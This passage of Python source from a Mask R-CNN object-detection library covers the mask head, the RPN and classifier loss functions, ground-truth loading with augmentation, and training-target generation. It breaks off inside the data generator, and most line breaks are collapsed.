Train or freeze Batch Norm layers Returns: Masks [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, NUM_CLASSES] """ # ROI Pooling # Shape: [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, channels] x = PyramidROIAlign([pool_size, pool_size], name="roi_align_mask")([rois, image_meta] + feature_maps) # Conv layers x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv1")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn1')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv2")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn2')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv3")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn3')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv4")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn4')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2DTranspose(256, (2, 2), strides=2, activation="relu"), name="mrcnn_mask_deconv")(x) x = KL.TimeDistributed(KL.Conv2D(num_classes, (1, 1), strides=1, activation="sigmoid"), name="mrcnn_mask")(x) return x ############################################################ # Loss Functions ############################################################ def smooth_l1_loss(y_true, y_pred): """Implements Smooth-L1 loss. y_true and y_pred are typically: [N, 4], but could be any shape. """ diff = K.abs(y_true - y_pred) less_than_one = K.cast(K.less(diff, 1.0), "float32") loss = (less_than_one * 0.5 * diff**2) + (1 - less_than_one) * (diff - 0.5) return loss def rpn_class_loss_graph(rpn_match, rpn_class_logits): """RPN anchor classifier loss. rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive, -1=negative, 0=neutral anchor. rpn_class_logits: [batch, anchors, 2]. RPN classifier logits for BG/FG. """ # Squeeze last dim to simplify rpn_match = tf.squeeze(rpn_match, -1) # Get anchor classes. Convert the -1/+1 match to 0/1 values. anchor_class = K.cast(K.equal(rpn_match, 1), tf.int32) # Positive and Negative anchors contribute to the loss, # but neutral anchors (match value = 0) don't. indices = tf.where(K.not_equal(rpn_match, 0)) # Pick rows that contribute to the loss and filter out the rest. rpn_class_logits = tf.gather_nd(rpn_class_logits, indices) anchor_class = tf.gather_nd(anchor_class, indices) # Cross entropy loss loss = K.sparse_categorical_crossentropy(target=anchor_class, output=rpn_class_logits, from_logits=True) loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0)) return loss def rpn_bbox_loss_graph(config, target_bbox, rpn_match, rpn_bbox): """Return the RPN bounding box loss graph. config: the model config object. target_bbox: [batch, max positive anchors, (dy, dx, log(dh), log(dw))]. Uses 0 padding to fill in unsed bbox deltas. rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive, -1=negative, 0=neutral anchor. rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))] """ # Positive anchors contribute to the loss, but negative and # neutral anchors (match value of 0 or -1) don't. rpn_match = K.squeeze(rpn_match, -1) indices = tf.where(K.equal(rpn_match, 1)) # Pick bbox deltas that contribute to the loss rpn_bbox = tf.gather_nd(rpn_bbox, indices) # Trim target bounding box deltas to the same length as rpn_bbox. 
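    # target_bbox is zero-padded to a fixed number of rows per image, while
    # rpn_bbox above keeps only the positive anchors. Counting the positive
    # anchors per image lets batch_pack_graph() pick just the rows that are
    # actually used. Example with hypothetical counts: if image 0 has 3
    # positive anchors and image 1 has 5, batch_counts = [3, 5] and only
    # the first 3 and first 5 rows of each image's target_bbox are kept.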
batch_counts = K.sum(K.cast(K.equal(rpn_match, 1), tf.int32), axis=1) target_bbox = batch_pack_graph(target_bbox, batch_counts, config.IMAGES_PER_GPU) loss = smooth_l1_loss(target_bbox, rpn_bbox) loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0)) return loss def mrcnn_class_loss_graph(target_class_ids, pred_class_logits, active_class_ids): """Loss for the classifier head of Mask RCNN. target_class_ids: [batch, num_rois]. Integer class IDs. Uses zero padding to fill in the array. pred_class_logits: [batch, num_rois, num_classes] active_class_ids: [batch, num_classes]. Has a value of 1 for classes that are in the dataset of the image, and 0 for classes that are not in the dataset. """ # During model building, Keras calls this function with # target_class_ids of type float32. Unclear why. Cast it # to int to get around it. target_class_ids = tf.cast(target_class_ids, 'int64') # Find predictions of classes that are not in the dataset. pred_class_ids = tf.argmax(pred_class_logits, axis=2) # TODO: Update this line to work with batch > 1. Right now it assumes all # images in a batch have the same active_class_ids pred_active = tf.gather(active_class_ids[0], pred_class_ids) # Loss loss = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=target_class_ids, logits=pred_class_logits) # Erase losses of predictions of classes that are not in the active # classes of the image. loss = loss * pred_active # Computer loss mean. Use only predictions that contribute # to the loss to get a correct mean. loss = tf.reduce_sum(loss) / tf.reduce_sum(pred_active) return loss def mrcnn_bbox_loss_graph(target_bbox, target_class_ids, pred_bbox): """Loss for Mask R-CNN bounding box refinement. target_bbox: [batch, num_rois, (dy, dx, log(dh), log(dw))] target_class_ids: [batch, num_rois]. Integer class IDs. pred_bbox: [batch, num_rois, num_classes, (dy, dx, log(dh), log(dw))] """ # Reshape to merge batch and roi dimensions for simplicity. target_class_ids = K.reshape(target_class_ids, (-1,)) target_bbox = K.reshape(target_bbox, (-1, 4)) pred_bbox = K.reshape(pred_bbox, (-1, K.int_shape(pred_bbox)[2], 4)) # Only positive ROIs contribute to the loss. And only # the right class_id of each ROI. Get their indices. positive_roi_ix = tf.where(target_class_ids > 0)[:, 0] positive_roi_class_ids = tf.cast( tf.gather(target_class_ids, positive_roi_ix), tf.int64) indices = tf.stack([positive_roi_ix, positive_roi_class_ids], axis=1) # Gather the deltas (predicted and true) that contribute to loss target_bbox = tf.gather(target_bbox, positive_roi_ix) pred_bbox = tf.gather_nd(pred_bbox, indices) # Smooth-L1 Loss loss = K.switch(tf.size(target_bbox) > 0, smooth_l1_loss(y_true=target_bbox, y_pred=pred_bbox), tf.constant(0.0)) loss = K.mean(loss) return loss def mrcnn_mask_loss_graph(target_masks, target_class_ids, pred_masks): """Mask binary cross-entropy loss for the masks head. target_masks: [batch, num_rois, height, width]. A float32 tensor of values 0 or 1. Uses zero padding to fill array. target_class_ids: [batch, num_rois]. Integer class IDs. Zero padded. pred_masks: [batch, proposals, height, width, num_classes] float32 tensor with values from 0 to 1. """ # Reshape for simplicity. Merge first two dimensions into one. 
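    # Shape walk-through with hypothetical sizes (batch B, R ROIs, 28x28
    # masks, C classes):
    #   target_masks: [B, R, 28, 28]    -> [B*R, 28, 28]
    #   pred_masks:   [B, R, 28, 28, C] -> [B*R, 28, 28, C]
    # pred_masks is then permuted to [B*R, C, 28, 28] so the class-specific
    # mask of each positive ROI can be picked with tf.gather_nd below.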
target_class_ids = K.reshape(target_class_ids, (-1,)) mask_shape = tf.shape(target_masks) target_masks = K.reshape(target_masks, (-1, mask_shape[2], mask_shape[3])) pred_shape = tf.shape(pred_masks) pred_masks = K.reshape(pred_masks, (-1, pred_shape[2], pred_shape[3], pred_shape[4])) # Permute predicted masks to [N, num_classes, height, width] pred_masks = tf.transpose(pred_masks, [0, 3, 1, 2]) # Only positive ROIs contribute to the loss. And only # the class specific mask of each ROI. positive_ix = tf.where(target_class_ids > 0)[:, 0] positive_class_ids = tf.cast( tf.gather(target_class_ids, positive_ix), tf.int64) indices = tf.stack([positive_ix, positive_class_ids], axis=1) # Gather the masks (predicted and true) that contribute to loss y_true = tf.gather(target_masks, positive_ix) y_pred = tf.gather_nd(pred_masks, indices) # Compute binary cross entropy. If no positive ROIs, then return 0. # shape: [batch, roi, num_classes] loss = K.switch(tf.size(y_true) > 0, K.binary_crossentropy(target=y_true, output=y_pred), tf.constant(0.0)) loss = K.mean(loss) return loss ############################################################ # Data Generator ############################################################ def load_image_gt(dataset, config, image_id, augment=False, augmentation=None, use_mini_mask=False): """Load and return ground truth data for an image (image, mask, bounding boxes). augment: (deprecated. Use augmentation instead). If true, apply random image augmentation. Currently, only horizontal flipping is offered. augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation. For example, passing imgaug.augmenters.Fliplr(0.5) flips images right/left 50% of the time. use_mini_mask: If False, returns full-size masks that are the same height and width as the original image. These can be big, for example 1024x1024x100 (for 100 instances). Mini masks are smaller, typically, 224x224 and are generated by extracting the bounding box of the object and resizing it to MINI_MASK_SHAPE. Returns: image: [height, width, 3] shape: the original shape of the image before resizing and cropping. class_ids: [instance_count] Integer class IDs bbox: [instance_count, (y1, x1, y2, x2)] mask: [height, width, instance_count]. The height and width are those of the image unless use_mini_mask is True, in which case they are defined in MINI_MASK_SHAPE. """ # Load image and mask image = dataset.load_image(image_id) mask, class_ids = dataset.load_mask(image_id) original_shape = image.shape image, window, scale, padding, crop = utils.resize_image( image, min_dim=config.IMAGE_MIN_DIM, min_scale=config.IMAGE_MIN_SCALE, max_dim=config.IMAGE_MAX_DIM, mode=config.IMAGE_RESIZE_MODE) mask = utils.resize_mask(mask, scale, padding, crop) # Random horizontal flips. # TODO: will be removed in a future update in favor of augmentation if augment: logging.warning("'augment' is deprecated. 
Use 'augmentation' instead.") if random.randint(0, 1): image = np.fliplr(image) mask = np.fliplr(mask) # Augmentation # This requires the imgaug lib (https://github.com/aleju/imgaug) if augmentation: import imgaug # Augmenters that are safe to apply to masks # Some, such as Affine, have settings that make them unsafe, so always # test your augmentation on masks MASK_AUGMENTERS = ["Sequential", "SomeOf", "OneOf", "Sometimes", "Fliplr", "Flipud", "CropAndPad", "Affine", "PiecewiseAffine"] def hook(images, augmenter, parents, default): """Determines which augmenters to apply to masks.""" return augmenter.__class__.__name__ in MASK_AUGMENTERS # Store shapes before augmentation to compare image_shape = image.shape mask_shape = mask.shape # Make augmenters deterministic to apply similarly to images and masks det = augmentation.to_deterministic() image = det.augment_image(image) # Change mask to np.uint8 because imgaug doesn't support np.bool mask = det.augment_image(mask.astype(np.uint8), hooks=imgaug.HooksImages(activator=hook)) # Verify that shapes didn't change assert image.shape == image_shape, "Augmentation shouldn't change image size" assert mask.shape == mask_shape, "Augmentation shouldn't change mask size" # Change mask back to bool mask = mask.astype(np.bool) # Note that some boxes might be all zeros if the corresponding mask got cropped out. # and here is to filter them out _idx = np.sum(mask, axis=(0, 1)) > 0 mask = mask[:, :, _idx] class_ids = class_ids[_idx] # Bounding boxes. Note that some boxes might be all zeros # if the corresponding mask got cropped out. # bbox: [num_instances, (y1, x1, y2, x2)] bbox = utils.extract_bboxes(mask) # Active classes # Different datasets have different classes, so track the # classes supported in the dataset of this image. active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32) source_class_ids = dataset.source_class_ids[dataset.image_info[image_id]["source"]] active_class_ids[source_class_ids] = 1 # Resize masks to smaller size to reduce memory usage if use_mini_mask: mask = utils.minimize_mask(bbox, mask, config.MINI_MASK_SHAPE) # Image meta data image_meta = compose_image_meta(image_id, original_shape, image.shape, window, scale, active_class_ids) return image, image_meta, class_ids, bbox, mask def build_detection_targets(rpn_rois, gt_class_ids, gt_boxes, gt_masks, config): """Generate targets for training Stage 2 classifier and mask heads. This is not used in normal training. It's useful for debugging or to train the Mask RCNN heads without using the RPN head. Inputs: rpn_rois: [N, (y1, x1, y2, x2)] proposal boxes. gt_class_ids: [instance count] Integer class IDs gt_boxes: [instance count, (y1, x1, y2, x2)] gt_masks: [height, width, instance count] Ground truth masks. Can be full size or mini-masks. Returns: rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. bboxes: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (y, x, log(h), log(w))]. Class-specific bbox refinements. masks: [TRAIN_ROIS_PER_IMAGE, height, width, NUM_CLASSES). Class specific masks cropped to bbox boundaries and resized to neural network output size. 
""" assert rpn_rois.shape[0] > 0 assert gt_class_ids.dtype == np.int32, "Expected int but got {}".format( gt_class_ids.dtype) assert gt_boxes.dtype == np.int32, "Expected int but got {}".format( gt_boxes.dtype) assert gt_masks.dtype == np.bool_, "Expected bool but got {}".format( gt_masks.dtype) # It's common to add GT Boxes to ROIs but we don't do that here because # according to XinLei Chen's paper, it doesn't help. # Trim empty padding in gt_boxes and gt_masks parts instance_ids = np.where(gt_class_ids > 0)[0] assert instance_ids.shape[0] > 0, "Image must contain instances." gt_class_ids = gt_class_ids[instance_ids] gt_boxes = gt_boxes[instance_ids] gt_masks = gt_masks[:, :, instance_ids] # Compute areas of ROIs and ground truth boxes. rpn_roi_area = (rpn_rois[:, 2] - rpn_rois[:, 0]) * \ (rpn_rois[:, 3] - rpn_rois[:, 1]) gt_box_area = (gt_boxes[:, 2] - gt_boxes[:, 0]) * \ (gt_boxes[:, 3] - gt_boxes[:, 1]) # Compute overlaps [rpn_rois, gt_boxes] overlaps = np.zeros((rpn_rois.shape[0], gt_boxes.shape[0])) for i in range(overlaps.shape[1]): gt = gt_boxes[i] overlaps[:, i] = utils.compute_iou( gt, rpn_rois, gt_box_area[i], rpn_roi_area) # Assign ROIs to GT boxes rpn_roi_iou_argmax = np.argmax(overlaps, axis=1) rpn_roi_iou_max = overlaps[np.arange( overlaps.shape[0]), rpn_roi_iou_argmax] # GT box assigned to each ROI rpn_roi_gt_boxes = gt_boxes[rpn_roi_iou_argmax] rpn_roi_gt_class_ids = gt_class_ids[rpn_roi_iou_argmax] # Positive ROIs are those with >= 0.5 IoU with a GT box. fg_ids = np.where(rpn_roi_iou_max > 0.5)[0] # Negative ROIs are those with max IoU 0.1-0.5 (hard example mining) # TODO: To hard example mine or not to hard example mine, that's the question # bg_ids = np.where((rpn_roi_iou_max >= 0.1) & (rpn_roi_iou_max < 0.5))[0] bg_ids = np.where(rpn_roi_iou_max < 0.5)[0] # Subsample ROIs. Aim for 33% foreground. # FG fg_roi_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO) if fg_ids.shape[0] > fg_roi_count: keep_fg_ids = np.random.choice(fg_ids, fg_roi_count, replace=False) else: keep_fg_ids = fg_ids # BG remaining = config.TRAIN_ROIS_PER_IMAGE - keep_fg_ids.shape[0] if bg_ids.shape[0] > remaining: keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False) else: keep_bg_ids = bg_ids # Combine indices of ROIs to keep keep = np.concatenate([keep_fg_ids, keep_bg_ids]) # Need more? remaining = config.TRAIN_ROIS_PER_IMAGE - keep.shape[0] if remaining > 0: # Looks like we don't have enough samples to maintain the desired # balance. Reduce requirements and fill in the rest. This is # likely different from the Mask RCNN paper. # There is a small chance we have neither fg nor bg samples. if keep.shape[0] == 0: # Pick bg regions with easier IoU threshold bg_ids = np.where(rpn_roi_iou_max < 0.5)[0] assert bg_ids.shape[0] >= remaining keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False) assert keep_bg_ids.shape[0] == remaining keep = np.concatenate([keep, keep_bg_ids]) else: # Fill the rest with repeated bg rois. keep_extra_ids = np.random.choice( keep_bg_ids, remaining, replace=True) keep = np.concatenate([keep, keep_extra_ids]) assert keep.shape[0] == config.TRAIN_ROIS_PER_IMAGE, \ "keep doesn't match ROI batch size {}, {}".format( keep.shape[0], config.TRAIN_ROIS_PER_IMAGE) # Reset the gt boxes assigned to BG ROIs. rpn_roi_gt_boxes[keep_bg_ids, :] = 0 rpn_roi_gt_class_ids[keep_bg_ids] = 0 # For each kept ROI, assign a class_id, and for FG ROIs also add bbox refinement. 
rois = rpn_rois[keep] roi_gt_boxes = rpn_roi_gt_boxes[keep] roi_gt_class_ids = rpn_roi_gt_class_ids[keep] roi_gt_assignment = rpn_roi_iou_argmax[keep] # Class-aware bbox deltas. [y, x, log(h), log(w)] bboxes = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.NUM_CLASSES, 4), dtype=np.float32) pos_ids = np.where(roi_gt_class_ids > 0)[0] bboxes[pos_ids, roi_gt_class_ids[pos_ids]] = utils.box_refinement( rois[pos_ids], roi_gt_boxes[pos_ids, :4]) # Normalize bbox refinements bboxes /= config.BBOX_STD_DEV # Generate class-specific target masks masks = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.MASK_SHAPE[0], config.MASK_SHAPE[1], config.NUM_CLASSES), dtype=np.float32) for i in pos_ids: class_id = roi_gt_class_ids[i] assert class_id > 0, "class id must be greater than 0" gt_id = roi_gt_assignment[i] class_mask = gt_masks[:, :, gt_id] if config.USE_MINI_MASK: # Create a mask placeholder, the size of the image placeholder = np.zeros(config.IMAGE_SHAPE[:2], dtype=bool) # GT box gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[gt_id] gt_w = gt_x2 - gt_x1 gt_h = gt_y2 - gt_y1 # Resize mini mask to size of GT box placeholder[gt_y1:gt_y2, gt_x1:gt_x2] = \ np.round(utils.resize(class_mask, (gt_h, gt_w))).astype(bool) # Place the mini batch in the placeholder class_mask = placeholder # Pick part of the mask and resize it y1, x1, y2, x2 = rois[i].astype(np.int32) m = class_mask[y1:y2, x1:x2] mask = utils.resize(m, config.MASK_SHAPE) masks[i, :, :, class_id] = mask return rois, roi_gt_class_ids, bboxes, masks def build_rpn_targets(image_shape, anchors, gt_class_ids, gt_boxes, config): """Given the anchors and GT boxes, compute overlaps and identify positive anchors and deltas to refine them to match their corresponding GT boxes. anchors: [num_anchors, (y1, x1, y2, x2)] gt_class_ids: [num_gt_boxes] Integer class IDs. gt_boxes: [num_gt_boxes, (y1, x1, y2, x2)] Returns: rpn_match: [N] (int32) matches between anchors and GT boxes. 1 = positive anchor, -1 = negative anchor, 0 = neutral rpn_bbox: [N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas. """ # RPN Match: 1 = positive anchor, -1 = negative anchor, 0 = neutral rpn_match = np.zeros([anchors.shape[0]], dtype=np.int32) # RPN bounding boxes: [max anchors per image, (dy, dx, log(dh), log(dw))] rpn_bbox = np.zeros((config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4)) # Handle COCO crowds # A crowd box in COCO is a bounding box around several instances. Exclude # them from training. A crowd box is given a negative class ID. crowd_ix = np.where(gt_class_ids < 0)[0] if crowd_ix.shape[0] > 0: # Filter out crowds from ground truth class IDs and boxes non_crowd_ix = np.where(gt_class_ids > 0)[0] crowd_boxes = gt_boxes[crowd_ix] gt_class_ids = gt_class_ids[non_crowd_ix] gt_boxes = gt_boxes[non_crowd_ix] # Compute overlaps with crowd boxes [anchors, crowds] crowd_overlaps = utils.compute_overlaps(anchors, crowd_boxes) crowd_iou_max = np.amax(crowd_overlaps, axis=1) no_crowd_bool = (crowd_iou_max < 0.001) else: # All anchors don't intersect a crowd no_crowd_bool = np.ones([anchors.shape[0]], dtype=bool) # Compute overlaps [num_anchors, num_gt_boxes] overlaps = utils.compute_overlaps(anchors, gt_boxes) # Match anchors to GT Boxes # If an anchor overlaps a GT box with IoU >= 0.7 then it's positive. # If an anchor overlaps a GT box with IoU < 0.3 then it's negative. # Neutral anchors are those that don't match the conditions above, # and they don't influence the loss function. # However, don't keep any GT box unmatched (rare, but happens). 
Instead, # match it to the closest anchor (even if its max IoU is < 0.3). # # 1. Set negative anchors first. They get overwritten below if a GT box is # matched to them. Skip boxes in crowd areas. anchor_iou_argmax = np.argmax(overlaps, axis=1) anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax] rpn_match[(anchor_iou_max < 0.3) & (no_crowd_bool)] = -1 # 2. Set an anchor for each GT box (regardless of IoU value). # If multiple anchors have the same IoU match all of them gt_iou_argmax = np.argwhere(overlaps == np.max(overlaps, axis=0))[:,0] rpn_match[gt_iou_argmax] = 1 # 3. Set anchors with high overlap as positive. rpn_match[anchor_iou_max >= 0.7] = 1 # Subsample to balance positive and negative anchors # Don't let positives be more than half the anchors ids = np.where(rpn_match == 1)[0] extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE // 2) if extra > 0: # Reset the extra ones to neutral ids = np.random.choice(ids, extra, replace=False) rpn_match[ids] = 0 # Same for negative proposals ids = np.where(rpn_match == -1)[0] extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE - np.sum(rpn_match == 1)) if extra > 0: # Rest the extra ones to neutral ids = np.random.choice(ids, extra, replace=False) rpn_match[ids] = 0 # For positive anchors, compute shift and scale needed to transform them # to match the corresponding GT boxes. ids = np.where(rpn_match == 1)[0] ix = 0 # index into rpn_bbox # TODO: use box_refinement() rather than duplicating the code here for i, a in zip(ids, anchors[ids]): # Closest gt box (it might have IoU < 0.7) gt = gt_boxes[anchor_iou_argmax[i]] # Convert coordinates to center plus width/height. # GT Box gt_h = gt[2] - gt[0] gt_w = gt[3] - gt[1] gt_center_y = gt[0] + 0.5 * gt_h gt_center_x = gt[1] + 0.5 * gt_w # Anchor a_h = a[2] - a[0] a_w = a[3] - a[1] a_center_y = a[0] + 0.5 * a_h a_center_x = a[1] + 0.5 * a_w # Compute the bbox refinement that the RPN should predict. rpn_bbox[ix] = [ (gt_center_y - a_center_y) / a_h, (gt_center_x - a_center_x) / a_w, np.log(gt_h / a_h), np.log(gt_w / a_w), ] # Normalize rpn_bbox[ix] /= config.RPN_BBOX_STD_DEV ix += 1 return rpn_match, rpn_bbox def generate_random_rois(image_shape, count, gt_class_ids, gt_boxes): """Generates ROI proposals similar to what a region proposal network would generate. image_shape: [Height, Width, Depth] count: Number of ROIs to generate gt_class_ids: [N] Integer ground truth class IDs gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels. Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels. """ # placeholder rois = np.zeros((count, 4), dtype=np.int32) # Generate random ROIs around GT boxes (90% of count) rois_per_box = int(0.9 * count / gt_boxes.shape[0]) for i in range(gt_boxes.shape[0]): gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i] h = gt_y2 - gt_y1 w = gt_x2 - gt_x1 # random boundaries r_y1 = max(gt_y1 - h, 0) r_y2 = min(gt_y2 + h, image_shape[0]) r_x1 = max(gt_x1 - w, 0) r_x2 = min(gt_x2 + w, image_shape[1]) # To avoid generating boxes with zero area, we generate double what # we need and filter out the extra. If we get fewer valid boxes # than we need, we loop and try again. 
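        # Rejection-sampling example with hypothetical numbers: to get
        # rois_per_box = 10 boxes, 20 candidate (y1, y2) and (x1, x2) pairs
        # are drawn, pairs whose two values differ by less than 1 pixel
        # (i.e. zero-area boxes) are discarded, and the first 10 survivors
        # are kept; if fewer than 10 survive, the whole draw is repeated.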
while True: y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2)) x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2)) # Filter out zero area boxes threshold = 1 y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:rois_per_box] x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:rois_per_box] if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box: break # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape # into x1, y1, x2, y2 order x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1) y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1) box_rois = np.hstack([y1, x1, y2, x2]) rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois # Generate random ROIs anywhere in the image (10% of count) remaining_count = count - (rois_per_box * gt_boxes.shape[0]) # To avoid generating boxes with zero area, we generate double what # we need and filter out the extra. If we get fewer valid boxes # than we need, we loop and try again. while True: y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2)) x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2)) # Filter out zero area boxes threshold = 1 y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:remaining_count] x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:remaining_count] if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count: break # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape # into x1, y1, x2, y2 order x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1) y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1) global_rois = np.hstack([y1, x1, y2, x2]) rois[-remaining_count:] = global_rois return rois def data_generator(dataset, config, shuffle=True, augment=False, augmentation=None, random_rois=0, batch_size=1, detection_targets=False, no_augmentation_sources=None): """A generator that returns images and corresponding target class ids, bounding box deltas, and masks. dataset: The Dataset object to pick data from config: The model config object shuffle: If True, shuffles the samples before every epoch augment: (deprecated. Use augmentation instead). If true, apply random image augmentation. Currently, only horizontal flipping is offered. augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation. For example, passing imgaug.augmenters.Fliplr(0.5) flips images right/left 50% of the time. random_rois: If > 0 then generate proposals to be used to train the network classifier and mask heads. Useful if training the Mask RCNN part without the RPN. batch_size: How many images to return in each call detection_targets: If True, generate detection targets (class IDs, bbox deltas, and masks). Typically for debugging or visualizations because in trainig detection targets are generated by DetectionTargetLayer. no_augmentation_sources: Optional. List of sources to exclude for augmentation. A source is string that identifies a dataset and is defined in the Dataset class. Returns a Python generator. Upon calling next() on it, the generator returns two lists, inputs and outputs. The contents of the lists differs depending on the received arguments: inputs list: - images: [batch, H, W, C] - image_meta: [batch, (meta data)] Image details. See compose_image_meta() - rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral) - rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas. 
- gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs - gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] - gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width are those of the image unless use_mini_mask is True, in which case they are defined in MINI_MASK_SHAPE. outputs list: Usually empty in regular training. But if detection_targets is True then the outputs list contains target class_ids, bbox deltas, and masks. """ b = 0 # batch item index image_index = -1 image_ids = np.copy(dataset.image_ids) error_count = 0 no_augmentation_sources = no_augmentation_sources or [] # Anchors # [anchor_count, (y1, x1, y2, x2)] backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE) anchors = utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES, config.RPN_ANCHOR_RATIOS, backbone_shapes, config.BACKBONE_STRIDES, config.RPN_ANCHOR_STRIDE) # Keras requires a generator to run indefinitely. while True: try: # Increment index to pick next image. Shuffle if at the start of an epoch. image_index = (image_index + 1) % len(image_ids) if shuffle and image_index == 0: np.random.shuffle(image_ids) # Get GT bounding boxes and masks for image. image_id = image_ids[image_index] # If the image source is not to be augmented pass None as augmentation if dataset.image_info[image_id]['source'] in no_augmentation_sources: image, image_meta, gt_class_ids, gt_boxes, gt_masks = \ load_image_gt(dataset, config, image_id, augment=augment, augmentation=None, use_mini_mask=config.USE_MINI_MASK) else: image, image_meta, gt_class_ids, gt_boxes, gt_masks = \ load_image_gt(dataset, config, image_id, augment=augment, augmentation=augmentation, use_mini_mask=config.USE_MINI_MASK) # Skip images that have no instances. This can happen in cases # where we train on a subset of classes and the image doesn't # have any of the classes we care about. if not np.any(gt_class_ids > 0): continue # RPN Targets rpn_match, rpn_bbox = build_rpn_targets(image.shape, anchors, gt_class_ids, gt_boxes, config) # Mask R-CNN Targets if random_rois: rpn_rois = generate_random_rois( image.shape, random_rois, gt_class_ids, gt_boxes) if detection_targets: rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask =\ build_detection_targets( rpn_rois, gt_class_ids, gt_boxes, gt_masks, config) # Init batch arrays if b == 0: batch_image_meta = np.zeros( (batch_size,) + image_meta.shape, dtype=image_meta.dtype) batch_rpn_match = np.zeros( [batch_size, anchors.shape[0], 1], dtype=rpn_match.dtype) batch_rpn_bbox = np.zeros( [batch_size, config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype) batch_images = np.zeros( (batch_size,) + image.shape, dtype=np.float32) batch_gt_class_ids = np.zeros( (batch_size, config.MAX_GT_INSTANCES), dtype=np.int32) batch_gt_boxes = np.zeros( (batch_size, config.MAX_GT_INSTANCES, 4), dtype=np.int32) batch_gt_masks = np.zeros( (batch_size, gt_masks.shape[0], gt_masks.shape[1], config.MAX_GT_INSTANCES), dtype=gt_masks.dtype) if random_rois: batch_rpn_rois = np.zeros( (batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype) if detection_targets: batch_rois = np.zeros( (batch_size,) + rois.shape, dtype=rois.dtype) batch_mrcnn_class_ids = np.zeros( (batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype) batch_mrcnn_bbox = np.zeros( (batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype) batch_mrcnn_mask = np.zeros( (batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype) # If more instances than fits in the array, sub-sample from them. 
